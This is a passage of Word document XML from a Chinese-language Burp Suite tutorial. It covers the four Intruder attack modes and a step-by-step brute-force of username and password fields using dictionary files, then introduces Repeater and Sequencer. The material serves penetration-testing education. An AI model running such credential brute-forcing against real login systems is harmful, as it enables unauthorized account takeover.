    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>假设有两个攻击点，username和password，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload添加为1和2.</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26A5189E" wp14:editId="26AE1EB8">
            <wp:extent cx="4972050" cy="4581525"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="图片 41" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\0]~R$P4RNIX572QVFDN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Documents\Tencent Files\2227891138\Image\C2C\0]~R$P4RNIX572QVFDNOC{4.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4972050" cy="4581525"/>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p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>niper：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>使用一个payload（字典）。每次在用payload中的一个值取替代一个待攻击的原始值。这种攻击类型对模糊测试的一些请求参数的漏洞非常有用。在攻击中生成的请求的总数是payload和待攻击参数数量的乘积。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00DD50F7" wp14:editId="4577B838">
            <wp:extent cx="5267325" cy="3657865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141" name="图片 141" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\6TO1[R)F0[TIZTI8ZXVK4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Documents\Tencent Files\2227891138\Image\C2C\6TO1[R)F0[TIZTI8ZXVK4IH.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId171" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270688" cy="36602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p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attering ram：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>使用一个payload（字典）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。它每次同时在所有待攻击参</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>数位置插入同一payload。当一次攻击需要在 HTTP 请求(如，Cookie 消息头和消息体里的用户名)中的多个位置上插入相同的有效负荷时，这个攻击类型非常有用。攻击产生的所有请求数量就是有效载荷的数量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE327CB" wp14:editId="517A67D1">
            <wp:extent cx="5267325" cy="4313758"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="图片 42" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\})CK8@FJKJSTU60$63X5G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Documents\Tencent Files\2227891138\Image\C2C\})CK8@FJKJSTU60$63X5G0L.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId172" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271894" cy="43175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p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itchfork：需要多个payload，payload集合个数等于待破解参数的个数。它给每个参数指定一个payload，攻击同时通过所有的有效负荷集合进行迭代，并在每一个位置上插入一个有效载荷。例如，第一个请求会把第一个payload里第一个值插入到第一个攻击位置，第二个payload里第一个值插入到第二个攻击位置。第二个请求会把第一个payload的第二个值插入到第一个位置，把第二个payload的第二个有效负荷插入到第二个位置，等等。当攻击需要将不同的但相关的输入插入到 HTTP 请求(如，一个数据域里的用户名，以及在其他数据域里的一个和用户名相关的 ID 号)的多个位置里时，这个攻击类型会有用的。由于payload集合的基数大小可能不一样，所以攻击产生的所有的请求数量是由payload基数的最小值决定。</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5FEDAB4B" wp14:editId="3BD14B71">
            <wp:extent cx="3962400" cy="2943225"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="145" name="图片 145" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\UT%QPCSULKO`_{N`Z[ODK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ocuments\Tencent Files\2227891138\Image\C2C\UT%QPCSULKO`_{N`Z[ODKWV.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3962400" cy="2943225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6747F6CE" wp14:editId="4ED424FC">
            <wp:extent cx="5233212" cy="3333750"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="149" name="图片 149" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\GV_LT@(XVIYEVHB]XDYLP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Documents\Tencent Files\2227891138\Image\C2C\GV_LT@(XVIYEVHB]XDYLPZO.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5247433" cy="334281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4）cluster bomb：需要多个payload，payload集合个数等于待破解参数的个数。它给每个参数指定一个payload。攻击会按照每个有效负荷集合的顺序进行迭代，于是所有的有效负荷排列组合都会被测试。例如，如果有 2 个有效负荷位置，攻击会把第一个有效负荷集合里的第一个有效负荷放置在第一个位置，在位置 2 里会迭代第二个有效负荷里的所有有效负荷；然后他会把第一个集合里第二个有效负荷放在第一个位置，然后在位置 2 上迭代集合 2 里的所有有效负荷。当攻击需要在 HTTP 请求(如，一个参数里的用户名和另一个参数里的密码)里插入不同的并且不相关的输入时，这个攻击类型会很有效。攻击产生的请求数量是在所有payload基数个数的乘积。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B9BC3D2" wp14:editId="61B414D2">
            <wp:extent cx="5275851" cy="4695825"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="151" name="图片 151" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\0P_9F9JQF)]D2XE$T0OR1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Documents\Tencent Files\2227891138\Image\C2C\0P_9F9JQF)]D2XE$T0OR1Y8.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5282553" cy="4701790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.进入payload选项，选择payload set的值为1，单击load按钮加载一个包含诸多用户名的文件。同样设置payload set的值为2，加载一个包含密码的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.设置完成后，点击start attack按钮开始攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8.开始攻击后，会弹出一个窗口，其中有制作好的所有请求。成功的请求与不成功的请求响应不同，所以长度也不一样。一般长的是破解成功的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548FABB5" wp14:editId="26BB1C6B">
            <wp:extent cx="5274310" cy="3828811"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43" name="图片 43" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\XD%[T9V8QPP3@R[L3Z860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XD%[T9V8QPP3@R[L3Z860R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828811"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="18" w:name="_Toc499884694"/>
      <w:r w:rsidRPr="00A603D8">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>epeater</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Burp Repeater作为Burp Suite中一款手工验证HTTP消息的测试工具，通常用于多次重放请求响应和手工修改请求消息后对服务器端响应的消息分析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>比如修改请求参数，验证输入的漏洞；修改请求参数，验证逻辑越权；从拦截历史记录中，捕获特征性的请求消息进行请求重放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>选中需要修改的请求右击，选中“send to repeater”。切换到repeater页面，请求消息区为客户端发送的请求消息的详细信息，用户可以手动修改请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="733DEA4B" wp14:editId="29522CA5">
            <wp:extent cx="5247699" cy="4257238"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="173" name="图片 173" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\P@OH[N~N6N{(4DUK`4F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Documents\Tencent Files\2227891138\Image\C2C\P@OH[N~N6N{(4DUK`4F4`UG.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5261606" cy="4268521"/>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当我们对请求的消息编辑完之后，点击“GO”按钮发送请求给服务器端。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>应答消息区为对应的请求消息点击GO”按钮后，服务器端的反馈消息。通过修改请求消息的参数来比对分析每次应答消息之间的差异，能更好的帮助我们分析系统可能存在的漏洞。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="508770E9" wp14:editId="7703729B">
            <wp:extent cx="5215419" cy="2959428"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="175" name="图片 175" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\9_YIO07FKY((J)PJBV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Documents\Tencent Files\2227891138\Image\C2C\9_YIO07FKY((J)PJBVAQ(%Q.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId178" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5253528" cy="2981052"/>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p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_Toc499884695"/>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sequencer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Burp Sequencer作为Burp Suite中一款用于检测数据样本随机性质量的工</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>具，通常用于检测访问令牌是否可预测、密码重置令牌是否可预测等场景，通过Sequencer的数据样本分析，能很好地降低这些关键数据被伪造的风险。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.选择登录设备的请求，发送到sequencer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A50ADF3" wp14:editId="642E370A">
            <wp:extent cx="5172075" cy="2978853"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177" name="图片 177" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\]JJA@H@8~M29{4Y0ZHVIB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Documents\Tencent Files\2227891138\Image\C2C\]JJA@H@8~M29{4Y0ZHVIBGD.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5194895" cy="2991996"/>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rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.进入Burp Sequencer的Live Capture面板，选中刚才发送过来的记录，点击Configure配置需要分析的token或者参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C026CD2" wp14:editId="6415AD99">
            <wp:extent cx="5255145" cy="4566875"/>
            <wp:effectExtent l="0" t="0" r="3175"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0" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
